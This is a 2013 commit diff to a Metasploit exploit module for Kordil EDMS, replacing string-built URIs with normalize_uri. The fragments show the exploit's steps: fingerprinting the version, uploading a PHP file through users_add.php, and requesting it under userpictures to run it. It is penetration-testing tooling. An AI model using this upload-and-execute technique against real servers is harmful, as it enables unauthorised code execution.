Uses normalize_uri

sinn3r · sinn3r · commit 690e7ec8a781 · 2013-02-25T13:28:00.000-06:00
diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil-edms-upload-exec.rb
@@ -49,14 +49,13 @@ def initialize(info={})
 	def check
 
 		base  = target_uri.path
-		base << '/' if base[-1, 1] != '/'
 		peer  = "#{rhost}:#{rport}"
 
 		# retrieve software version from login page
 		begin
 			res = send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}global_group_login.php"
+				'uri'    => normalize_uri(base, 'global_group_login.php')
 			})
 			if res and res.code == 200
 				if res.body =~ /<center><font face="Arial" size="2">Kordil EDMS v2\.2\.60/
@@ -84,7 +83,7 @@ def upload(base, file)
 
 		res = send_request_cgi({
 			'method'  => 'POST',
-			'uri'     => "#{base}users_add.php",
+			'uri'     => normalize_uri(base, 'users_add.php'),
 			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
 			'data'    => data_post
 		})
@@ -104,7 +103,6 @@ def on_new_session(client)
 	def exploit
 
 		base   = target_uri.path
-		base  << '/' if base[-1, 1] != '/'
 		@peer  = "#{rhost}:#{rport}"
 		@fname = rand_text_numeric(7)
 
@@ -127,7 +125,7 @@ def exploit
 		begin
 			res = send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}userpictures/#{@fname}.php"
+				'uri'    => normalize_uri(base, 'userpictures', "#{@fname}.php")
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
